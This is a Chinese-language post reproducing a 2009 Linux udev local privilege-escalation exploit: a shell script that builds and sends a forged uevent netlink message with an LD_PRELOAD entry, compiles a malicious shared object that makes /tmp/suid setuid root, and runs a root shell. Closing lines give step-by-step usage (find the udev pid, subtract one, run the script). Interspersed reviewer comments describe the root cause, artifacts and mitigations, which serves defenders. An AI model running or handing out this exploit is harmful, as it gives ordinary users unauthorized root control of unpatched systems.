普通用户通过udev漏洞提升到root权限
2011-12-06 15:26
#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
#
# Reviewer notes (defensive reading of this listing):
#   - NOTE(review): the line structure was restored from a copy whose newlines
#     were lost; the code tokens are unchanged, the indentation is not original.
#   - Three sources are generated and compiled here: udev.c, program.c and
#     suid.c. Nothing in the script checks a return value or cleans up.
#   - Root cause, as far as this listing shows: the technique depends on the
#     udev daemon acting on a uevent-formatted netlink datagram that was sent
#     by an ordinary user process rather than by the kernel. Presumably fixed
#     udev packages reject such messages by checking the sender -- confirm
#     against the vendor advisory for the distribution in question.
#   - Artifacts a responder can look for, all taken from the commands below:
#     /tmp/udev, /tmp/libno_ex.so.1.0, /tmp/suid (root-owned with the setuid
#     bit), and udev.c / program.c / program.o / suid.c / libno_ex.so.1.0 in
#     the working directory.
#   - A setuid-root file under /tmp and an LD_PRELOAD= entry inside a uevent
#     are both anomalous on a normal system. Mounting /tmp with nosuid keeps
#     the setuid bit on /tmp/suid from taking effect.

# udev.c: builds one message in uevent layout ("add@/dev/foo" followed by
# NUL-separated KEY=VALUE strings, the last one being LD_PRELOAD pointing at
# /tmp/libno_ex.so.1.0) and sends it with sendmsg() to the netlink pid taken
# from argv[1]. argv[1] is passed to atoi() without any check, and the
# buf/buflen/sz variables are assigned but never used.
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif

#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
    char sysfspath[SHORT_STRING];
    char subsystem[SHORT_STRING];
    char event[SHORT_STRING];
    char major[SHORT_STRING];
    char minor[SHORT_STRING];

    sprintf(event, "add");
    sprintf(subsystem, "block");
    sprintf(sysfspath, "/dev/foo");
    sprintf(major, "8");
    sprintf(minor, "1");

    memset(&address, 0, sizeof(address));
    address.nl_family = AF_NETLINK;
    address.nl_pid = atoi(argv[1]);
    address.nl_groups = 0;

    msg.msg_name = (void*)&address;
    msg.msg_namelen = sizeof(address);
    msg.msg_iov = &iovector;
    msg.msg_iovlen = 1;

    socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
    bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

    char message[LONG_STRING];
    char *mp;

    mp = message;
    mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
    mp += sprintf(mp, "ACTION=%s", event) +1;
    mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
    mp += sprintf(mp, "MAJOR=%s", major) +1;
    mp += sprintf(mp, "MINOR=%s", minor) +1;
    mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
    mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;

    iovector.iov_base = (void*)message;
    iovector.iov_len = (int)(mp-message);

    char *buf;
    int buflen;
    buf = (char *) &msg;
    buflen = (int)(mp-message);

    sendmsg(socket_fd, &msg, 0);

    close(socket_fd);

    sleep(10);
// execl("/tmp/suid", "suid", (void*)0);
}
_EOF
gcc udev.c -o /tmp/udev

# program.c: a shared object whose only function is _init. It calls
# setgid(0)/setuid(0), removes LD_PRELOAD from the environment, then chowns
# /tmp/suid to uid 0 / gid 0 and sets a mode that includes S_ISUID. Those
# calls can only succeed when the process loading the library already runs
# as root. The link step uses -nostartfiles so that this _init does not clash
# with the one normally supplied by the C runtime start files.
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>

void _init()
{
    setgid(0);
    setuid(0);
    unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
    chown("/tmp/suid",0,0);
    chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles

# suid.c: calls setgid(0) and setuid(0), then replaces itself with /bin/sh.
# On its own this binary grants nothing; it only matters once the chown/chmod
# in program.c has been applied to /tmp/suid by a root process.
cat > suid.c << _EOF
int main(void) {
    setgid(0); setuid(0);
    execl("/bin/sh","sh",0);
}
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0

# $1 is the netlink pid described in the header; it is passed through unquoted.
/tmp/udev $1

# milw0rm.com [2009-04-20]
# NOTE(review): in the collapsed listing this command followed the milw0rm
# line without a visible break; placing it on its own line is inferred.
/tmp/suid
将以上代码保存为root.sh, chmod 777 root.sh
然后查询UDEV pid
ps -ef | grep udev
看到ROOT udev pid, 然后减去1 , 如 500 -1 =499
./root.sh 499
注意:
$ rpm -q udev
如果版本号高于或等于
udev-095-14.20
说明该漏洞已经修复,上述方法无效;低于该版本的系统应尽快升级 udev 软件包。注意:rpm 命令和这个版本号只适用于基于 RPM 的发行版,其他发行版请以各自的安全公告为准。